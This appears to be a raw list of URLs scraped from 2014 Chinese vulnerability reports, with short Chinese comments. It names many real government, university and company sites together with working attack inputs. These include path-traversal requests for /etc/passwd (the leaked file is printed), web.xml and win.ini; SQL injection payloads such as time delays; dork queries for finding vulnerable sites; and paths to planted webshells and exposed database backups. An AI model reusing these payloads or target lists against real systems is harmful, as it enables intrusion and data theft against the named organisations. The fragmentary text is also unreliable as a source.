http://125.67.235.94:8080/issp/pages/login.action http://www.lzdfzf.gov.cn/zgAdmin/ http://www.jlxw.gov.cn/zgAdmin/ http://www.codoon.com/verify_email?email=邮箱地址&code=时间戳 http://www.codoon.com/verify_email?email=邮箱地址&code=2838 
http://www.codoon.com/verify_email?email=邮箱地址&code=2840 http://jgxs.njau.edu.cn:8011/ad_Index.asp http://jgxs.njau.edu.cn:8011/info_Print.asp?ArticleID=210 http://115.238.166.123:8081 http://wooyun.org/bugs/wooyun-2014-050728思路大致相同! http://house.focus.cn/common/yaohao/checkkh.php?yh_id=257&kh= https://180.169.55.153/login!login.action https://180.169.55.153/login!login.action http://218.193.51.132:8080/Lims/Login.action http://218.193.51.132:8080/Lims/Silic.jsp http://x:8080/aicberm/loginAction!login.action http://211.142.39.96:8080/aicberm/Silic.jsp http://www.sq315.gov.cn/ http://testportal2.ceair.com/ http://i.fun.tv http://www1.jiande.gov.cn/web/CFCount/%E4%B9%98%E9%A3%8E%E7%A8%8B%E5%BA%8F%E5%AE%89%E8%A3%85%E8%AF%B4%E6%98%8E.txt http://www.qqcf.com http://www.qqcf.com/?action=list&list=cfcount http://www1.jiande.gov.cn/web/CFCount/Admin.asp http://www.ahpost.com.cn/com/view.php?boardid=2 http://www.ahpost.com.cn/com/viewnews.php?newsid=5121 http://www.ahpost.com.cn/com/view.php?boardid=2&setid=0%20boardid=2%20amd%201=2 http://www.ahpost.com.cn/bbs/ http://www.xian3g.com/P/msi.aspx?TitleName=PPSS&SInfo= http://h.bilibili.com/search?keyword=%27 http://goto.mail.sohu.com/admin/user.tar http://m.yy.com/live/swf/Shareobject.swf?v=1.1 http://m.yy.com/live/1980062727/ http://admin.dooland.com/test/news/admin.php http://www.gsciq.gov.cn/manage/MagLogin.asp http://www.fwwb.gov.cn/pages/Page.html http://fwwb.fwmys.mofcom.gov.cn/login.html http://rjck.fwmys.mofcom.gov.cn/login.html http://fwwbqy.fwmys.mofcom.gov.cn/login.html http://www.cnoa.cn http://127.0.0.1/index.php?app=news&func=news&action=view&task=desktoplist&sid=1&_dc=1405133386843 http://127.0.0.1/index.php?app=news&func=news&action=view&task=desktoplist&sid=1&_dc=1405133386843可得到结果 http://127.0.0.1/index.php?app=news&func=news&action=view&task=desktoplist&sid=1&_dc=1405133386843 http://127.0.0.1/index.php?app=news&func=news&action=view&task=desktoplist&_dc=1405133386843&sid=1 
http://127.0.0.1/index.php?app=news&func=news&action=view&task=desktoplist&_dc=1405133386843&sid=1 http://211.151.121.183:9200 http://www.yoybuy.com/cn/ gz.focus.cn/vote/brand_intro.php?brand_id=46 house.focus.cn/vote/brand_intro.php?brand_id=67 dl.focus.cn/vote/brand_intro.php?brand_id= house.focus.cn/vote/brand_intro.php?brand_id=3 bjmsg.focus.cn/vote/brand_intro.php?brand_id= hz.focus.cn/vote/brand_intro.php?brand_id=19 qhd.focus.cn/vote/brand_intro.php?brand_id= sh.focus.cn/vote/brand_intro.php?brand_id=50 dg.focus.cn/vote/brand_intro.php?brand_id=97 office.focus.cn/vote/brand_intro.php?brand_id= http://www.ggj.hbjt.gov.cn/ggj/news/listNews.jsp?artColumn=0302010201 http://q.letv.com/question/1925 http://www.csndmc.ac.cn/newweb/secondpage.jsp?id=1440 http://111.10.24.94/main.aspx?Id=1&groupId=4 http://cpaexam.cicpa.org.cn/ArticleMngAction.do?filePath=/../../../etc/passwd%00.jpg&method=downFile root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin 
postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin ricci:x:140:140:ricci user:/var/lib/ricci:/sbin/nologin cicpa:x:500:500::/home/cicpa:/bin/bash weihu:x:501:501::/home/weihu:/bin/bash http://www.9555168.com/list.php?cat=24 http://111.10.24.146/list.php?cat=24 http://sqlmap.org http://nms.qq.zen-game.com http://zabbix.zen-game.com http://dwgk.cnu.edu.cn/editortpxx/upload.jsp http://183.63.149.105:9200服务器ElasticSearch命令执行漏洞 http://119.147.42.45/ http://119.147.42.45:9090/web-console/ http://gbbs.gsta.com http://www.pkpm.cn/】,公司开发的专用于工程监督的内容管理系统存在多个注入漏洞,可以这么说:到处都是注射漏洞啊!前人也有提交过,不过前人提交的只是单纯的一个注射漏洞,这里提交不重复多个注入漏洞吧: https://wen.lu/search?biw=1024&bih=663&noj=1&q=inurl%3AInfoValue.aspx%3Fid%3D&oq=inurl%3AInfoValue.aspx%3Fid%3D&gs_l=serp.3...5914.8010.0.8245.8.7.1.0.0.0.233.1203.0j6j1.7.0....0...1c.1j4.48.serp..8.0.0.-CfJcmMLbm0 http://jlxzxk.zjbts.gov.cn:93/UserManage/UserApply.aspx http://tishow.dota2.com.cn/ http://tishow.dota2.com.cn/index.php?m=Index&a=down&path=../../../etc/passwd http://219.143.252.160/Product/product_list.aspx?MenuID=010301 http://bbs.snwh.gov.cn/ http://www.shop7z.com/Demo/order_checknoprint.asp?checkno=1&id=1 http://125.62.63.7/ http://125.62.63.7/general/crm/apps/crm/include/dele http://sqlmap.org http://125.62.63.229:81 http://www.chinawutong.com/ashx/rediec http://cdc.cma.gov.cn/dataSetDetailed.do?changeFlag=dataLogger&dsId= http://library.cma.gov.cn:8082/phpstat/server_counts_json.php?artid=49112 http://wisportal.cma.gov.cn/wis/jsp/DataQuery/queryMetaDataXML.dhcc?PID= http://wisportal.cma.gov.cn/wis/jsp/googleMap/DataXML.dhcc?PID= http://qk.cams.cma.gov.cn/jams/ch/index.aspx?year_id=2014&quarter_id=3 http://202.195.176.29/gmis/login.aspx inurl:show.asp?id= 
https://www.google.com.tw/?gws_rd=ssl#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E7%9B%9B%E4%B8%96%E5%BD%A9%E8%99%B9+inurl:show.asp%3Fid%3D&start=20 http://quan.sohu.com/api/redirect?url=,这个网址存在随意跳情况。 http://quan.sohu.com/api/redirect?url=http://weichch.apphb.com/qq?clientid=100327010%23。结尾用了一个URI编码的hash,因为腾讯会把编码的hash变为真正的hash,然后让一个可以传到server的URL顺理成章的变成了浏览器行为,不会被server捕捉到的hash。此问题已经反映给腾讯,不过腾讯那帮sb似乎不认为这是bug。那就让他公开吧。 http://www.shop7z.com/Demo/order_print.asp?id=1 http://gh.cmge.com/game/view/id/6* http://202.113.20.120 http://202.113.20.120/admin/edit_localuser.php?UserId=3802&TableName=AllUser http://202.113.20.120/include/common.ini http://202.113.6.228/ http://125.62.63.64/ http://125.62.63.64/conn.inc http://58.54.134.248/TeachView.asp?id=21%27 http://www.dcqdssyxx.com/TeachView.asp?id=22%27 http://www.zcvc.cn/dgb/StudentView.asp?id=13%27 http://www.tajx.com/TeacherView.asp?id=12%27 http://118.112.184.98:90/NewsView.asp?id=35%27 http://www.tajx.com/Newsview.asp?id=20%27 http://www.yjsdszx.com/NewsView.asp?id=31%27 http://www.zhwdxx.com/NewsView.asp?id=11%27 http://www.sxtjxx.net/TeachView.asp?id=13%27 http://www.yrenedu.com/MoralsView.asp?id=21%27 http://www.sxtjxx.net/Newsview.asp?id=29%27 http://www.tajx.com/TeacherView.asp?id=12 http://sqlmap.org http://wooyun.org/bugs/wooyun-2014-055776 https://202.112.42.186/ http://tj.7daysinn.cn/contrib/security/pages/login.aspx http://tj.7daysinn.cn/contrib/security/pages/register.aspx http://graduate.nbu.edu.cn/ http://5156edu.com http://user.5156edu.com/register1.php?f_username=hackev1l http://www.aviva-cofco.com.cn https://gps.aviva-cofco.com.cn/CardAgent/common/cvar/CExec.jsp http://try.mama.cn/notice.php?id=184 http://oa.syc.com.cn/oa/fckeditor/editor/filemanager/connectors/test.html http://oa.syc.com.cn/SITE_KGJ_WEB/uploadfile/201407/file/%5C/2014071310101619.asp http://www.eee.cn/manager.do 
http://www.baidu.com/s?wd=2008-2014%20点威科技%20版权所有&rsv_bp=0&tn=baidu&rsv_spt=3&ie=utf-8&rsv_n=2&rsv_sug3=1&rsv_sug4=27&inputT=1078 http://222.179.90.110:81/control/uia/access.do http://58.42.230.66:8081/control/uia/access.do http://www.nzzj.com:8888/control/uia/access.do http://220.164.63.27:8868/control/uia/access.do http://221.232.139.94:8080/control/uia/access.do http://www.sglr.gov.cn/other/apply.asp http://www.wuhanja.jcy.gov.cn/setup/adminlogin.asp http://www.cysl.gov.cn/news/admin/admin.asp inurl:inquiry.php http://v5.demo.cutecms.cn/news/admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.hbfys.cn/admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.500wpc.com/admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.ke-sen.com/admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://nh.traderen.net/admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.scfae.com/ http://www.hiall.com.cn/ http://jpkc.zzti.edu.cn/Announcement/Announcement.asp?AnnounceId=5 http://ywxk.heuet.edu.cn/show.jsp?id=36 http://finance.whu.edu.cn/web3/content.aspx?lb=zc http://jrxy.zufe.edu.cn/index.jsp?urltype=tree.TreeTempUrl&wbtreeid=1957 http://cartoon.twt.edu.cn/sub_fanzu.php?id=308 http://bec.jnu.edu.cn/Dynamicindex.aspx?type=4 http://news.sdp.edu.cn/show_news.php?id=4314 http://jdx.hnzj.edu.cn/about.asp?classid=14 http://balis5.ustb.edu.cn/notice/notice_List.aspx?type=0 http://zs.chenggong.edu.cn/NewsDetail.asp?id=404 http://ssp.lib.sjtu.edu.cn/browse.php?o=l http://gggl.ncu.edu.cn/list.asp?cate=A0013 http://sics.ynnu.edu.cn/articleview2.aspx?id=648 http://yuanban.sqnc.edu.cn/showcontent.php?id=390 http://jrxy.lixin.edu.cn/default.php?mod=article&settype=0&fid=39 http://lib.haut.edu.cn/ResourceList.aspx?SectionId=1926e339-3699-4118-89e4-074ed0bf6ea6 http://acad.cumt.edu.cn/View.aspx?id=1357 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35 
http://jy.qhnu.edu.cn/admin/manager/admin_voting_show.php?page_id=14 http://sope.ruc.edu.cn/more.php?cid=253 http://qzlx.hue.edu.cn/index.php?action=list&id=91 http://library.qust.edu.cn/articleshow.asp?ArticleID=195 http://sklppb.cau.edu.cn/Tplatform.asp?ID=1 http://jijian.qjnu.edu.cn/showArt.asp?id=892 http://cjy.qfnu.edu.cn/look_skip009.asp?yiid=10 http://tpxy.usts.edu.cn/tpxsc2013/news/news_more.asp?lm2=5 http://jjglx.hbsi.edu.cn/read.asp?id=737 http://studyatsyu.syu.edu.cn/yu.asp?id=172 http://gdsz.scnu.edu.cn/news.asp?type=15 http://eng.zjiet.edu.cn/list.asp?pid=165 http://lntgw.lnu.edu.cn/info.php?num=161 http://xinquban.henau.edu.cn/onews.asp?id=770 http://xtck.bistu.edu.cn/ShowNews.aspx?NewsId=27 http://jxms.dgut.edu.cn/mingshi.asp?m=songy http://1y.nuc.edu.cn/Detail_Img.aspx?kind=86&parent=84 http://lib.glmc.edu.cn/news/Play.asp?id=521 http://jpkc.sdau.edu.cn/new2/content.aspx?type=wjjs&id=2 http://www.gsee.edu.cn/zxmt_list.jsp?urltype=tree.TreeTempUrl&wbtreeid=1005 http://tw.lixin.edu.cn/default.php?mod=article&fid=1 http://library.wit.edu.cn/qaonline/display.asp?id=79 http://huiwenhua.ahu.edu.cn/list.php?act=news http://zj.gcvtc.edu.cn/Class.asp?C=1 http://lib.cumtb.edu.cn/CommonQusetion.aspx?SectionId=3c369f17-81db-48c6-8b8f-be12707a99f5 http://yzw.gdut.edu.cn/list.php?typeid=156 http://hos.nenu.edu.cn/culture.asp?id=4 http://jiuye.sxufe.edu.cn/class.asp?id=55 http://zb.yctc.edu.cn/EC_Usercenter.asp?action=Userinfo&id=3230 http://en.tmmu.edu.cn/pages/info.aspx?id=19df0793-1a83-42a4-afdc-5791c51fd134 http://szb.dgut.edu.cn/class.asp?id=51 http://mba.njfu.edu.cn/news_list.asp?id=88 http://zytx.eszy.edu.cn/site_pages/shownews.asp?id=80 http://rccsh.sxu.edu.cn/class.asp?classid=69 http://sxc.zjc.edu.cn/photolist.asp?classid=7 http://fund.tongji.edu.cn/down.asp?id=13 http://rwjd.zjgsu.edu.cn/content/detail.php?sid=23&cid=514&id=1006 http://zihuan.swu.edu.cn/list.php?bid=13 http://bbg.henau.edu.cn/NewsDetail.asp?id=993 http://tw.lnist.edu.cn/column.asp?id=1 
http://yjs.wit.edu.cn/rule_detail.asp?ParentID=2&News_ID=999 http://www.hq.tzc.edu.cn/boardnews.asp?id=269 http://sunshine.zstu.edu.cn/weekly/index.php?r=site/photoshow&wid=54 http://bio.fjzs.edu.cn/news.asp?districtid=5 http://rwx.huat.edu.cn/dzgz.asp?bigclassid=58 http://zjc.ccucm.edu.cn/jiuye.php?m=Content&a=show&id=557 http://fzsbcg.sqnc.edu.cn/more.asp?classid=67 http://inta.ep.tsinghua.edu.cn/news/g_show.asp?id=1020 http://tisc.cfau.edu.cn/studio/gsjj.asp?sort=1&id=1 http://wxy.lcu.edu.cn/m_list.asp?id=105 http://www.ans.ustc.edu.cn/list.php?catalog_id=41 http://wzpb.hist.edu.cn/pbjg.jsp?urltype=survey.SurveyStatisticUrl&wbtreeid=1001&surveyid=1008 http://sj.media.edu.cn/index2.php?ID=13 http://gs.dlut.edu.cn/showmorepeiyang_zhengce.asp?deptsortName_zhengce=%E5%AD%A6%E7%B1%8D%E7%AE%A1%E7%90%86&NewsDeptSortSort=3201 http://wlxh.zjiet.edu.cn/Sort.asp?SortID=42 http://www.gonghui.sdu.edu.cn/issue/admin/show_table.php?tableid=32 http://cwcx.muc.edu.cn/LawChildList.aspx?zc_class=1001 http://xxgc.wzmc.edu.cn/download.aspx?cateId=7 http://youth.njfu.edu.cn/info.php?id=22 http://zz.qhnu.edu.cn/admin/manager/admin_voting_show.php?page_id=13 http://est.dlut.edu.cn/showCallBoard.asp?zid=17 http://iics.lzu.edu.cn/iics/main_docs.aspx?pID=wz01100028 http://mba.cau.edu.cn/invest.php?tid=1 http://gjjl.sdp.edu.cn/Content.aspx?id=25 http://shuxue.sqnc.edu.cn/shownews.asp?newsid=2248 http://www.ceu.zju.edu.cn/itpeceu/itpe_cn/newsdetaile.asp?ID=489 http://yjsb.tjpu.edu.cn/build.php?sortid=11 http://kjcw.lixin.edu.cn/default.php?mod=article&fid=10 http://dfi.bnuz.edu.cn/article.php?id=10 http://www.hsit.edu.cn/news/list.asp?listid=73 http://lib.zzu.edu.cn/article_list.aspx?Paid=0be0481f-5927-43f9-8c89-4918c8fd448f http://jyzd.usts.edu.cn/lyb/index.asp?id=13361 http://tw.zjiet.edu.cn/showBulletin.asp?bulletin_ID=193 http://xkfw.nbu.edu.cn/main_pages.aspx?id=p_1 http://sme.xidian.edu.cn/college.asp?id=148 http://yjs.hbut.edu.cn/news_more.asp?lm=93 
http://xinchuan.njnu.edu.cn/news.asp?id=410 http://www.dlrj.edu.cn/Details.aspx?infoId=85 http://www.gcvtc.edu.cn/lunwenshow.asp?id=90 http://bwc.huat.edu.cn/article.asp?id=113 http://www.bfamcmc.edu.cn/about/index.asp?id=17 http://gdjy.cumt.edu.cn/About.asp?id=12 http://bdyj.sdibt.edu.cn/bdsc.asp?type_id=ytjj http://cxzy.cumtb.edu.cn/info.php?id=301 http://psy.ruc.edu.cn/activityinfo.php?id=8 http://tuanwei.cueb.edu.cn/xueshenghui/news_show.asp?news_id=85 http://math.tongji.edu.cn/show.aspx?info_lb=7&flag=7&info_id=964 http://child.bnu.edu.cn/ShowNew.aspx?wid=4802 http://sice.cufe.edu.cn/en/sort.asp?dy1=SICE http://www.rsc.tzc.edu.cn/more.asp?boardid=10 http://xsc.hrbcu.edu.cn/showContent.php?id=277 http://pec.zzuli.edu.cn/show2.asp?type=%E4%BF%A1%E6%81%AF%E5%8F%91%E5%B8%83&id=227 http://heucfe.hrbeu.edu.cn/jxjyjd.aspx?name=jdjj http://office.nenu.edu.cn/info/info2.asp?id=3366 http://jjh.sdu.edu.cn/about2.php?id=3 http://xshxy.gxun.edu.cn/zhao/info/class.asp?id=4 http://kyc.nenu.edu.cn/res_ex_s.asp?nclass=15 http://www.csc.edu.cn/laihua/universitysearch.aspx?provinceId=13 http://xzb.lhmc.edu.cn/List.aspx?id=6 http://itd.hnfnu.edu.cn/tongxingongcheng/kwsj_detail.asp?id=57 http://www.hanqing.ruc.edu.cn/detail.php?class=news&iClassID=9&iInfoID=1764 http://jgy.swpu.edu.cn/DownQuery.aspx?id=1 http://www.cs.imnu.edu.cn/main/news/nsnews.php?id=1488 http://zs.havct.edu.cn/list.asp?id=75 http://zhwh.zzuli.edu.cn/Exchange.aspx?id=13 inurl:asp?newsId= https://www.google.com.tw/?gws_rd=ssl#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E5%A5%87%E6%89%8D%E7%A7%91%E6%8A%80+inurl:asp%3FnewsId%3D&start=0 sn.189.cn/service/pay/payment.action?tab=bankCard,输完手机号(仅陕西电信)后出现了星号隐藏的姓名 http://bbs.lemote.com/ http://m.soufun.com/appspread.d?m=sweeperweima&id=8354&from=soufun&imei=868918689186891 http://www.chinavvv.com】开发的专门用于河南一带人民政府使用的系统存在通用SQL注射漏洞。此发现主要是根据前人的经验 
http://64.233.***.***/search?q=inurl:index.jsp%3Fid%3D+inurl:name%3D+inurl:id_id&newwindow=1&hl=zh-CN&ei=ECzCU7DTOuiQ0AX0yYHQDA&start=20&sa=N&biw=1024&bih=663 http://211.142.**.*** http://www.chinavvv.com/viewCmsCac.do?cacId=4aef140927420fe60127753a80ec0162 http://www.850820.com/ http://www.magtech.com.cn/CN/model/index.shtml) http://61.177.182.148:8080/LTS/exam.action http://info.dg11185.com/card/registerAction.action http://news.jinyinmao.com.cn/ http://help.jinyinmao.com.cn/ http://www.scjg.com.cn/ http://www.scjg.com.cn/admin/Login.aspx http://chat.51kehu.com/ctrl/index.aspx?txUserName=1&txPassword=1 http://ba.72dns.com,登陆处POST注入,用户名 http://wooyun.org/bugs/wooyun-2014-065444 http://emlab.usst.edu.cn/model/TwoGradePage/CIntroduce.aspx?columnId=7 http://app.sohu.com/topic/info?topic_id=29 http://datamarket.baidu.com/web/app.html#app/index inurl:enterprise-info!getCompanyInfo.action http://www.schj.gov.cn/wryjcxx/filedownload.action?inputPath=upfile/../WEB-INF/web.xml&inputName=web.xml http://www.xjmic.com/enterprisemonitor/filedownload.action?inputPath=upfile/../WEB-INF/web.xml&inputName=web.xml http://222.247.51.155:9000/filedownload.action?inputPath=upfile/../../../../../login.jsp&inputName=login.jsp http://202.136.217.188:8800/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://nmgepb.gov.cn:8088/enterprisemonitor/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://182.148.109.184/filedownload.action?inputPath=upfile/../WEB-INF/web.xml&inputName=web.xml http://www.schj.gov.cn/wryjcxx/filedownload.action?inputPath=upfile/../WEB-INF/web.xml&inputName=web.xml http://www.schj.gov.cn/wryjcxx/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://www.xjmic.com/enterprisemonitor/filedownload.action?inputPath=upfile/../WEB-INF/web.xml&inputName=web.xml http://www.xjmic.com/enterprisemonitor/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp 
http://222.247.51.155:9000/filedownload.action?inputPath=upfile/../../../../../login.jsp&inputName=login.jsp http://202.136.217.188:8800/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://nmgepb.gov.cn:8088/enterprisemonitor/filedownload.action?inputPath=upfile/../login.jsp&inputName=login.jsp http://bbs.cailele.com/ http://www.woniuad.com/cn/login_login.action http://zscq.e23.cn/ClassShow.jsp?BigClassID=2&SClassID=-1;%20waitfor%20delay%20%270:0:0%27%20--%20 http://zscq.e23.cn/ClassShow.jsp?BigClassID=2&SClassID=-1;%20waitfor%20delay%20%270:0:5%27%20--%20 http://www.juyuanmall.com/ http://www.juyuanmall.com/gw/list.jsp?cat=180存在注入漏洞 mail.jxdpf.gov.cn/为邮箱首页.点击申请注册可以顺利注册。而且弱口令密码可以注册,这使邮箱用户有被爆破密码的危险。政府GOV邮箱具有一定的权威性,一般不会对外开放注册的,可任意注册让诈骗不法分子获得更具迷惑性身份伪装,使欺诈成功率上升。 http://vrlab.sdjzu.edu.cn/aspnews/ http://event.asus.com.cn/2013/volunteer/appraiseView.asp?xjID=56 http://www.hsw.cn/adv/2006/05/07_mx/web_mengx.htm http://www.hsw.cn/adv/2006/05/07_mx/sms_mengx.htm http://dapei.mo.vancl.com/ http://dapei.mo.vancl.com/suitapp/login.jsp site:baozoumanhua.com inurl:www http://debug.baozoumanhua.com/login http://m.baozou.com/login inurl:about.asp?smallclassid http://zfbz.10.gov.cn/list.asp?bigclassid=102//test http://jc.10.gov.cn/list.asp?bigclassid=88 http://www.ycylyy.com/list.asp?bigclassid=106 http://yjj.10.gov.cn/list.asp?bigclassid=52 http://www.cni22iec.com.cn/list.asp?bigclassid=107 http://www.ylgtzy.gov.cn/list.asp?bigclassid=107 http://ylls.5210.cn/list.asp?bigclassid=97 http://www.sxylzx.com/list.asp?bigclassid=77 http://www.hbdygl.com/list.asp?bigclassid=98 http://zfbz.10.gov.cn/list.asp?bigclassid=102为例进行测试 http://www.cni22iec.com.cn/view.asp?id=2182 http://www.ycylgjj.cn/view.asp?id=1688 http://jc.10.gov.cn/view.asp?id=1480 http://www.ycylyy.com/view.asp?id=2182 http://yjj.10.gov.cn/view.asp?id=503 http://www.ylgtzy.gov.cn/view.asp?id=4205 http://ylls.5210.cn/view.asp?id=1953 http://www.sxylzx.com/view.asp?id=3485 
http://www.ylljf.net/view.asp?id=656 http://www.hbdygl.com/view.asp?id=1148 http://www.cni22iec.com.cn/view.asp?id=2182对漏洞进行测试 http://zfbz.10.gov.cn/about.asp?smallclassid=186 http://jc.10.gov.cn/about.asp?smallclassid=184 http://www.cni22iec.com.cn/about.asp?smallclassid=182 http://www.ycylgjj.cn/about.asp?smallclassid=182 http://www.ycylyy.com/about.asp?smallclassid=182 http://www.ylgtzy.gov.cn/about.asp?smallclassid=182 http://ylls.5210.cn/about.asp?smallclassid=212 http://www.sxylzx.com/about.asp?smallclassid=182 http://www.ylljf.net/about.asp?smallclassid=182 http://www.hbdygl.com/about.asp?smallclassid=190 http://www.ycylyy.com/about.asp?smallclassid=182为例测试 http://q1.sto.cn/shoujireg/register注册和找回密码过程中 http://www.taozfu.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php http://www.taozfu188.com/admin/ind_backstage.asp http://stat.letv.com/vplay/apis/playertime_detect.php?vid=null&a=1&b=1611&uuid=4f371d6b374940c0f43aac1f3d1723e8 http://tzjg.zssj.gov.cn/login/CmsSubmit.do http://www.xiangcall.com/list.action http://www.xiangcall.com:8080/jspma.jsp http://www.xiangcall.com:8080/shell.jsp http://www.xiangcall.com:8080/one8.jsp http://www.xiangcall.com/WEB-INF/classes/jdbc.properties http://sqlmap.org www.hbfcmy.com)拿到webshell之后在网站根目录写入一句话 http://demo.31390.com:8080/eLearning/user.html http://demo.31390.com:8080/eLearning/message/s800.html http://ssd3.31390.com/eLearning/user.html http://jhxx.mhedu.sh.cn/eLearning/user.html http://genomics.cafs.ac.cn/fpc/WebAGCoL/Carp/WebFcmp/ http://genomics.cafs.ac.cn/index.php?do=fbwz_del&id=84 http://genomics.cafs.ac.cn/hy.sql http://genomics.cafs.ac.cn/GeneR/WEB-INF/lib/ inurl:policylaw/policylaw.do http://www.hzxf12345.gov.cn/policylaw/policylaw.do?act=read&filePath=C:\Windows\System32\drivers\etc\hosts&fileContentType= http://218.108.102.212:1234/policylaw/policylaw.do?act=read&filePath=C:\Windows\System32\drivers\etc\hosts&fileContentType= 
http://xf.jianggan.gov.cn/jgxfw/policylaw/policylaw.do?act=read&filePath=c:/Windows/win.ini&fileContentType= http://122.224.136.141:3465/scwsxf/policylaw/policylaw.do?act=read&filePath=c://Windows//win.ini&fileContentType= http://122.224.76.165/xcwsxf/policylaw/policylaw.do?act=read&filePath=c://Windows//win.ini&fileContentType= http://www.72dns.com/smsadmin/Sms_Api.aspx http://moffice.wo.com.cn/news_show.php?MenuID=5&CaseID=2 http://post.10jqka.com.cn/admin?do=login http://service.tp-link.com.cn/search.html?level1=%E6%97%A0%E7%BA%BF%E4%BA%A7%E5%93%81&level2=HyFi%E6%99%BA%E8%83%BD%E6%97%A0%E7%BA%BF&product=TL-H18E%2FTL-H18R&kw=TL http://service.tp-link.com.cn/search.html?level1=%E6%97% http://sqlmap.org http://aoi.androidesk.com/)后直接在电脑端操作。 http://aoi.androidesk.com/myedit http://stock2.finance.sina.com.cn/licai/api/jsonp_v2.php/$cb/ProductRateService.getRateYear?type=AVG&seq=1&_=$rn http://card.dgpt.edu.cn/managerNManager.action http://ecard.sjtu.edu.cn/managerNManager.action http://kwzx.hbue.edu.cn/managerNManager.action http://ecard.tyut.edu.cn/managerNManager.action http://id.gzu.edu.cn/managerNManager.action http://ecard.ouc.edu.cn/managerNManager.action http://ecard.sdu.edu.cn/managerNManager.action http://ecard.jxust.cn/managerNManager.action http://card1.upc.edu.cn/managerNManager.action http://www.ecard.sdwu.edu.cn/managerNManager.action http://card.dgpt.edu.cn/manager/ http://card.dgpt.edu.cn/images/ http://card.dgpt.edu.cn/help/ http://card.dgpt.edu.cn/css/ http://card.dgpt.edu.cn/js/ http://card.dgpt.edu.cn/pages/ http://card.dgpt.edu.cn/examples/ http://card.dgpt.edu.cn/index.htm http://card.dgpt.edu.cn/application/ http://card.dgpt.edu.cn/images/face/ http://card.dgpt.edu.cn/admin/users/ http://card.dgpt.edu.cn/managerNManager.action http://www.zsbtv.com.cn/Comment/Comments4.aspx?contentid=10436 http://www.zsbtv.com.cn/Comment/Comments.aspx?contentid=10150 http://app.shudianbao.com/more?action=vipInfo&&userid=1 
http://app.shudianbao.com/registe?action=resetPassword&&phone=13705287766&&pwd=111111 http://zzy.gscass.cn/sdor/login.action http://zzy.gscass.cn/sdor http://127.0.0.1/v7/cache/mysql_bak/2014-0~1.kxq/0.sql http://forum.anywlan.com/ http://www.gyport.com/ADMIN/admin.asp http://www.hljrtvu.com/NewWeb/HLJRTVUWeb/leichinews/admin/adminlogin.asp http://lib.wzmc.edu.cn/news/admin/adminlogin.asp http://zzrs.hnctcm.edu.cn/admin/admin.asp http://shehui.synu.edu.cn/admin/admin.asp http://www.cysl.gov.cn/news/admin/admin.asp http://www.jntc.nm.cn/jwz/sswhjsy/admin/admin.asp http://114.112.82.200:9001/ http://www.tjnp.com.cn/admin_login.aspx http://www.tjnp.com.cn/upload/2014-07/1.aspx http://job.hust.edu.cn/admin/doLogin.htm http://drops.wooyun.org/papers/548 http://zhongkao.haedu.gov.cn/zhongzhao/cgkdo?action=list&code=410102600142 http://mec.gdei.edu.cn/web-console/ http://v.baidu.com/#word=%bf",alert&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&oq=&f=3&rsp=&ie=utf-8 http://v.baidu.com/#word=%ff"a&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&oq=&f=3&rsp=&ie=utf-8 http://list.client.pplive.cn/v3/proxy?s=http://zt.pptv.com/clientzt/sports/ice/index.html http://www.kekenet.com/broadcast/201407/311657.shtml http://xinsheng.zfc.edu.cn/yxxt/web/zzfw_index.do http://news.xcar.com.cn/xbackend/apps/adclick/ad_hit_info/redirect.php?id=36155 http://www.jslit.com/ http://www.changyi.gov.cn:8806/zwgk/login.jsp http://www.sdsg.gov.cn:8088/zwgk/login.jsp# http://119.191.58.186:8082/zwgk/login.jsp# http://61.133.99.98:8806/zwgkxs/login.jsp http://www.belleintl.com/index.php http://www.belleintl.com/news2.php?id=49 http://mail.ahrb.com.cn/ http://wooyun.org/bugs/wooyun-2014-058462 http://mpro.caaa.cn/article.php?id=5716 http://oa.china-sss.com http://www.shangdunet.com/ http://www.kfga.gov.cn/login.jsp http://www.zkcz.gov.cn/login.jsp http://www.shilongqu.gov.cn/login.jsp http://zfxxgk.shilongqu.gov.cn:8080/zwgk/login.jsp http://www.wuzhi.gov.cn/login.jsp http://125.46.62.125:8868/zwgk/login.jsp 
